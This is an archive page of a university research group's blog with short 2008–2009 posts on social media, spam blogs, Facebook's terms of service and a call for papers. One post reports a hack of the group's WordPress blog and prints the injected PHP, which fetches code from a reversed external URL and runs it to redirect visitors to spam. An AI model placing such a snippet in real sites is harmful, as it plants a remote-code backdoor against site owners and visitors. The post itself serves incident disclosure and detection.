 | Blogging 
Archive for the 'Blogging' Category
June 27th, 2009, by Tim Finin, posted in Blogging, Semantic Web, Social media, Wikipedia
| important dates |
| abstracts |
21 Sept 09 |
| submissions |
01 Oct 09 |
| notification |
15 Dec 09 |
| final copy |
15 Jan 10 |
| publication |
April 10 |
The Journal of Web Semantics will publish a special issue on Data Mining and Social Network Analysis for integrating Semantic Web and Web 2.0 in the spring of 2010. The special issue will be edited by Bettina Berendt, Andreas Hotho and Gerd Stumme and initial abstracts for papers must be submitted via the Elsevier EES system by September 21, 2009.
The special issue, invites contributions that show how synergies between Semantic Web and Web 2.0 techniques can be successfully used. Since both communities work on network-like data structures, analysis methods from different fields of research could form a link between those communities. Techniques can be - but are not limited to - social network analysis, graph analysis, machine learning and data mining methods.
Relevant topics include
- ontology learning from Web 2.0 data
- instance extraction from Web 2.0 systems
- analysis of Blogs
- discovering social structures and communities
- predicting trends and user behaviour
- analysis of dynamic networks
- using content of the Web for modelling
- discovering misuse and fraud
- network analysis of social resource sharing systems
- analysis of folksonomies and other Web 2.0 data structures
- analysis of Web 2.0 applications and their data
- deriving profiles from usage
- personalized delivery of news and journals
- Semantic Web personalization
- Semantic Web technologies for recommender systems
- ubiquitous data mining in Web (2.0) environment
- applications
Edit | Bookmark@del.icio.us | Trackback | 1 Comment »
May 21st, 2009, by Tim Finin, posted in Ebiquity, Google, Security, splog
Yesterday we discovered that our ebiquity blog had been hacked. It looks like a vulnerability in our old Wordpress installation was exploited to add the following code to the top of our blog’s main page.
< ?php $site = create_function('','$cachedir="/tmp/"; $param="qq"; $key=$_GET[$param]; $rand="1239aef"; $said=23; $type=1; $stprot="http://blogwp.info"; '.file_get_contents(strrev("txt.mrahp/elpmaxe/deliated/ofni.pwgolb//:ptth"))); $site(); ?>
This code caused URLs like http://ebiquity.umbc.edu/?qq=1671 to redirect to a spam page. We’ve upgraded the blog to the latest Wordpress release, which hopefully will prevent this exploit from being used again. (Notice the reversed URL — LOL!)
We discovered the problem though a clever trick I read about last year on a site I’ve forgotten (maybe here). We created several Google alerts triggered by the appearance of spam-related words on pages apparently hosted by ebiquity.umbc.edu. For example:
- adult OR girls OR sex OR sexx OR XXX OR porn OR pornography site:ebiquity.umbc.edu
- viagra OR cialis OR levitra OR Phentermine OR Xanax site:ebiquity.umbc.edu
I would get several false positives a month from these alerts triggered by non-spam entries on our site. In fact, *this* post will generate a false positive. But yesterday I got a true positive. Looking at the log files, I think I got the alert within a few hours of when our blog was hacked. So I am happy to say that this worked and worked well. Without this alert, it might have taken weeks to notice the problem.

The results of this Google search reveal many compromised blogs from the .edu domain.
Edit | Bookmark@del.icio.us | Trackback | 2 Comments »
May 11th, 2009, by Tim Finin, posted in Blogging, Programming, Social media, Twitter
We all know that some programming languages are a joy to use and others can be damned painful. Lukas Biewald ran an interesting experiment to gather some data about this in his post, The Programming Language with the Happiest Users.
“Which languages make programmers the happiest? … I decided to do a little market research. I scraped the top 150 most recent tweets on Twitter for the query “X language” where X was one of {COBOL, Ruby, Fortran, Python, Visual Basic, Perl, Java, Haskell, Lisp, C}. Then I asked three people on Amazon Mechanical Turk to verify that the tweet was on the topic. If so, I asked if the tweet seemed positive, negative or neutral. …”
Great idea and a nice use of Amazon Mechanical Turk!
Edit | Bookmark@del.icio.us | Trackback | 3 Comments »
May 7th, 2009, by Tim Finin, posted in Google, Social media, splog
We maintain Planet Social Media Research (SMR) as a feed aggregator for a set of blogs relevant to research in social media systems. A few days ago I noticed that it wasn’t including new posts from some of the blogs. After updating the Planet Venus software we use and poking around I discovered that our server is unable to access any feeds that resolve to Feedburner.
Apparently Feedburner has a blacklist of IP addresses that it blocks and our server must now be on it. We have a request in to straighten this out and hope that everything will be back to normal very soon. ( I was to get our own blog back onto Planet SMR because I reconfigured the system to revert to the old, non-Feedburner feed.)
We’ve not yet heard from Feedburner/Google and don’t know why we are on their blacklist. It’s unlikely to be a result of our accessing feeds too frequently: we rebuild the site and aggregated feed once an hour and only about ten of our feeds resolve to feedburner.
My speculation is that this is collateral damage in the global war on spam. The easiest way for splogs (spam blogs) to get content is to hijack feeds from other blogs. Web spammers can do even better at disguising their splogs as legitimate sites if they aggregate several feeds that are topically related.
One way to fight such splogs is to deny them access to the feeds. So Google could be trying to protect Feedburner users and also be a good steward of the the Web environment by blocking suspected web spammers from the feeds hosted by Feedburner.
So, my guess is that the Google thinks that the Planet SMR site is a splog. We are not, of course. We only include the feeds of blogs that want to be on SMR. We also do not host any ads, which is a motivation for most splogs.
If our speculation is right, and Google is blocking our access because it thinks we are a splog site, then there will be many other legitimate feed aggregator sites that have or soon will have this problem.
By the way — we are always interested in suggestions for new blogs to add to Planet SMR. If you have or know of one, contact us as planet-smr at cs.umbc.edu.
update 5/8: We’ve identified and solved the problem, thanks to Google Freebase ‘community expert’ Franklin Tse. The problem was due to our having an old entry for the freebase IP address in the server’s /etc/hosts table. I think we added when we were having some technical difficulties some years ago and wanted to keep our key services running smoothly. I guess the trouble with quick temporary hacks is that they’re easy to forget and come back to bite you.
Edit | Bookmark@del.icio.us | Trackback | No Comments »
April 3rd, 2009, by Tim Finin, posted in Blogging, Twitter, UMBC
Earlier this week the Baltimore Sun’s Andrew Ratner had a story on Twitter, When did Twitter take over the universe?. The story had this interesting quote from UMBC’s Zeynep Tufekci:
Some people who study technology aren’t sure Twitter will endure.
“Frankly, I think a lot of twittering is somewhat faddish, whereas I never thought Facebook was. … People I interviewed and surveyed would talk of serious feeling of deprivation without Facebook and I’ve hardly heard anyone say that about twitter,” Zeynep Tufekci, an assistant professor who teaches the sociology of technology at the University of Maryland, Baltimore County, wrote in an e-mail. “Will people Twitter five years from now? Perhaps, but I would not be surprised if they did not, or at least as much.”
Edit | Bookmark@del.icio.us | Trackback | 3 Comments »
March 1st, 2009, by Tim Finin, posted in Blogging, Social media
Traditional newspapers are in a crisis. Last week the 150 year old Rocky Mountain News published its last issue and the Philadelphia Inquirer filed for bankruptcy. Experts have been saying for some time that the newspapers need to focus on one aspect that can not be commoditized — local news. It’s also clear that news content delivered via ink on dead trees is not a working model for the future.
Jeff Jarvis, director of CUNY’s interactive journalism program, describes one new experiment that sounds very promising in a post titled The Times & CUNY (and others) go hyperlocal.
The New York Times is about to announce that it is starting a hyperlocal product called The Local working with our students at CUNY’s Graduate School of Journalism. PaidContent has the story early. So I’ll tell you about the school’s and my involvement and plans.
At CUNY, we were working on a hyperlocal plan of our own, aimed at taking one New York neighborhood and turning it into the ultimate hyperlocal community as a showcase to both demonstrate how a community could be empowered to report on itself and to create a laboratory where our students could learn to interact with the public in new and collaborative ways. The problem with teaching interactive journalism, which is what we call my department, is that students don’t have a public with whom to interact.
Edit | Bookmark@del.icio.us | Trackback | No Comments »
February 18th, 2009, by Tim Finin, posted in Blogging, Privacy, Social media
Late last night Facebook CEO Mark Zuckerberg announced in a blog post, Update on Terms, that they have rolled back the recent changes to their Terms of Service agreement and restored the previous one.
“Many of us at Facebook spent most of today discussing how best to move forward. One approach would have been to quickly amend the new terms with new language to clarify our positions further. Another approach was simply to revert to our old terms while we begin working on our next version. As we thought through this, we reached out to respected organizations to get their input.
Going forward, we’ve decided to take a new approach towards developing our terms. We concluded that returning to our previous terms was the right thing for now. As I said yesterday, we think that a lot of the language in our terms is overly formal and protective so we don’t plan to leave it there for long.”
The NYT reported the change in a story today, Facebook Withdraws Changes in Data Use.
In his post, Zuckerberg continued by observing that with 175 million members, if it were a country, it would be the sixth most populated one in the world. Of course, sometimes a population revolts and lays claim to certain unalienable rights, among theme being life, liberty, pursuit of happiness and ownership of one’s online content.
So, the missing clause is back in the FB TOS:
“You may remove your User Content from the Site at any time. If you choose to remove your User Content, the license granted above will automatically expire, however you acknowledge that the Company may retain archived copies of your User Content.”
This revision is dated 23 September 2008. Curiously, I checked the Internet Archive to review the history of FB’s TOS but found that there are no archived copies after 12 October 2007. I can only imagine that FB asked the Internet Archive to stop saving copies of this public page. I note that the last archived copies of many of their public pages (e.g., privacy policy, developers page, etc.) are also from 2007. These pages are not blocked by the FB robots.txt and are normally accessible to anyone, so it must be by a specific request that they not be archived.
That’s too bad. Having an easy way to see how the policies of important social sites like FB evolve would be a great resource to those who study online social media as well as to many curious users.
Edit | Bookmark@del.icio.us | Trackback | 3 Comments »
October 19th, 2008, by Tim Finin, posted in Blogging, Social media, Web
Andrew Sullivan has an article, Why I Blog, in the November issue of The Atlantic in which he talks about blogging and why he does it.
“From the first few days of using the form, I was hooked. The simple experience of being able to directly broadcast my own words to readers was an exhilarating literary liberation. Unlike the current generation of writers, who have only ever blogged, I knew firsthand what the alternative meant. I’d edited a weekly print magazine, The New Republic, for five years, and written countless columns and essays for a variety of traditional outlets. And in all this, I’d often chafed, as most writers do, at the endless delays, revisions, office politics, editorial fights, and last-minute cuts for space that dead-tree publishing entails. Blogging—even to an audience of a few hundred in the early days—was intoxicatingly free in comparison. Like taking a narcotic.”
Sullivan is a good writer and an early adopter of the blogging form. He is often controversial, unusually provocative, and worth reading.
Edit | Bookmark@del.icio.us | Trackback | 1 Comment »
September 29th, 2008, by Tim Finin, posted in Blogging, GENERAL, Mobile Computing, Social media
The NYT has a short note (Letting Our Fingers Do the Talking ) on a new Nielsen Mobile report on texting use in the US.
“In the fourth quarter of 2007, American cellphone subscribers for the first time sent text messages more than they phoned, according to Nielsen Mobile. Since then, the average subscriber’s volume of text messages has shot upward by 64 percent, while the average number of calls has dropped slightly.”
The article also points out that “Teenagers ages 13 to 17 are by far the most prolific texters, sending or receiving 1,742 messages a month”. The Nielsen data shows that this age group sends two orders of magnitude more data than people over 65.
Note that texting is more popular than calling for all but the last three age groups.
Edit | Bookmark@del.icio.us | Trackback | 1 Comment »
July 8th, 2008, by Anupam Joshi, posted in AI, Blogging, Datamining, Social media, Twitter, Web 2.0, cloud computing
Here at Ebiquity, we’ve had a number of great grad students. One of them, Akshay Java, hacked out a search engine for twitter posts around early April last year, and named it twitterment. He blogged about it here first. He did it without the benefit of the XMPP updates, by parsing the public timeline. It got talked about in the blogosphere, (including by Scoble), got some press, and there was an article in the MIT Tech review that used his visualization of some of the twitter links. It even got talked about in Wired’s blog, something we found out only yesterday. We were also told that three days after the post in Wired’s blog, someone somewhere registered the domain twitterment.com (I won’t feed them pagerank by linking!), and set up a page that looks very similar to Akshay’s. It has Google Adsense, and of course just passes the query to Google with a site restriction to twitter. So they’re poaching coffee and cookie money from the students in our lab
So of course we played with Akshay’s hack, hosted it on one of our university boxes for a few months, but didn’t really have the bandwidth or compute (or time) resources to keep up. Startups such as summize appeared later and provided similar functionality. For the last week or two we’ve been moving the code of twitterment to Amazon’s cloud to restart the service. Of course, today comes the news that twitter might buy summize, quasi confirmed by Om Malik. Lesson to you grad students — if you come up with something clever, file an invention disclosure with your university’s tech transfer folks. And don’t listen to your advisors if they think that there isn’t a paper in what you’ve hacked — there may yet be a few million dollars in it
Edit | Bookmark@del.icio.us | Trackback | 4 Comments »
July 1st, 2008, by Tim Finin, posted in Social media, Web, splog
The Washington Posts Security Fix blog has a post, Amazon: Hey Spammers, Get Off My Cloud!, reporting on allegations that spammers are starting to use Amazon’s Elastic Compute Cloud (EC2) servers. It only makes sense — you can sign up easily without committing to a contract of any length, the price is low, and the IP addresses are drawn from a wide range, making it hard to block them all. Besides, if Amazon’s EC2 IP addresses all get put in a spam blacklist, it will be bad for their many legitimate users. It may be tricky for Amazon to police this.
Edit | Bookmark@del.icio.us | Trackback | No Comments »
July 1st, 2008, by Tim Finin, posted in Social media, splog
A good fraction of the comment spam that makes it through our Akismet filter is from people who are trying to add a comment to one of our posts about spam blogs or comments. Here’s an example from today’s batch, a comment on a two-year old post Blog comment spam with plagiarized text: hard to spot from cameroun trying to promote the site africapresse.com.
“spam is a real problem in this day not just for .edu but for the entire internet world. Plagiarism is a problem too.”
It’s easy for me to classify this as spam since the comment was made on a very old post, is short, includes a reference to a site that looks commercial, makes a few general and superficial statements that are not really tied to any of the posts details.
I think it’s ironic that so many SEO wannabes try to spam posts about spam. I guess they just have spam on the brain. So, I offer up this post as food for the comment spammers and their search and comment tools.
akismet, anti-spam, antispam, automated, automated, automatic, backlink, backlinks, bad behavior, blacklist, block, blocking, blog, blogging, capcha, comment, comment spam, comments, human, keywords, links, links, nofollow, pagerank, people, plagiarize, plagiarism, rank, search engine optimization, seo, spam, spam blogs, spam comments, spam karma, spamming, splog, splog, splogs, steal, target, trackbacks, traffic, typepad, wordpress.
Edit | Bookmark@del.icio.us | Trackback | 7 Comments »
|  | You are currently browsing the archives for the Blogging category.
  Home
|
Archive
|
Login
|
Feed
|  |